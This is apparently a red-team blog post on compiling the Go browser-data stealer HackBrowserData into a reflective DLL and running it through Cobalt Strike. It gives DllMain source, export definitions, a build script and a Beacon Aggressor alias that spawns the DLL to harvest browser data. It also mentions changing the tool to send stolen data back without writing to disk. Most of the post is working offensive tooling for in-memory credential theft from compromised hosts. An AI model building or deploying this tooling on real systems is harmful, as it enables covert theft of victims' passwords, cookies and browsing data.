# Reflective DLL Conversion of a Go Project

## Introduction

There is not much to say about reflective loading itself. On a whim I wanted to see whether a reflective module could be built from Go, and found that someone had already paved the way, so a manual shout-out to [WBGlIl](https://github.com/WBGlIl). I chose the [HackBrowserData](https://github.com/moonD4rk/HackBrowserData) project as the target.

## Process

First, change some of the default options: remove some strings, fix the output format to JSON, and enable compressed storage.

![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVec4uIf8er71oshyRX%2Fimage.png?alt=media\&token=a0801dd9-ab3a-4f94-a244-9093a5e938ca)

Copy the main function, name the copy `run`, and export it.

![Note: the comment above is part of the compilation; it declares the export.](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVeccDCg-lA-hMrW_wB%2Fimage.png?alt=media\&token=70a15742-30eb-4d1d-8b05-7b6b9a78b3ea)

Add the following files.

`dllmain.def`:

```
; dllmain.def
EXPORTS
    run
    ReflectiveLoader
```

`dllmain.c`:

```c
// dllmain.c
#include "dllmain.h"        // header generated by the Go c-archive build; declares run()
#include <Windows.h>
#include <stdio.h>

#define DLL_QUERY_HMODULE 6

extern HINSTANCE hAppInstance;   // defined in ReflectiveLoader.c

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
	BOOL bReturnValue = TRUE;
	switch (dwReason) {
		case DLL_QUERY_HMODULE:
			if (lpReserved != NULL)
				*(HMODULE *)lpReserved = hAppInstance;
			break;
		case DLL_PROCESS_ATTACH:
			hAppInstance = hinstDLL;
			run();              // the exported Go entry point (the copied main)
			fflush(stdout);
			ExitProcess(0);
			break;
		case DLL_PROCESS_DETACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
			break;
	}
	return bReturnValue;
}
```

`dllmain.go`:

```go
// dllmain.go
package main

//#include "dllmain.h"
//#include "ReflectiveLoader.h"
import "C"
```

`ReflectiveLoader.h`: omitted here...

Then compile with the following bat script.

```bat
:: x64
del dllmain.a
set GOARCH=amd64
:: -trimpath strips the GOPATH prefix from file paths embedded in the binary
go build -a -v --gcflags=-trimpath=%GOPATH% -asmflags=-trimpath=%GOPATH% -ldflags "-w -s" -buildmode=c-archive -o dllmain.a
gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll
move dllmain.dll reflective_dll.x64.dll

:: x32
set GOARCH=386
set CGO_ENABLED=0
set path=E:\mingw32\bin\;%path%
go build --ldflags "-s -w" -buildmode=c-archive -o dllmain.a
gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll
move dllmain.dll reflective_dll.dll
```

Then modify the project so that it sends the data back without writing anything to disk; I will not paste that part of the code.

![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVegEuo4rCtt4yM7SKw%2Fimage.png?alt=media\&token=27f37067-7060-4e54-af7d-a869de4b0543)

## Result

Patch both of them first.

![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVeeMMwm0LDuz1wJ1z_%2Fimage.png?alt=media\&token=4a126924-f2c8-426c-800e-737e71358659)

Both of them run.

![](https://3969710588-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3GuIlaAXU8NbJTCRei%2F-MVebJExZD8QJhgIxPwB%2F-MVeec-Q_UUtEGkKOSpo%2Fimage.png?alt=media\&token=85a8d028-6e6d-47c0-8072-211b839c66a1)

Write the cna script.

```
alias hackDataBrowers {
	local('$dll');
	btask($1, "Task Beacon to run HackDataBrowers", "T9999");
	# pick the DLL matching the Beacon's architecture
	if (-is64 $1) {
		$dll = getFileProper(script_resource("resources"), "reflective_dll.x64.dll");
	}
	else {
		$dll = getFileProper(script_resource("resources"), "reflective_dll.dll");
	}
	bdllspawn($1, $dll, $2, "Get Browsers Data", 5000, false);
}
```

### Remaining Issues

The thing is far too large; CS's reflective loader function simply gives up on it...

## LINKS

{% embed url="https://github.com/WBGlIl" %}
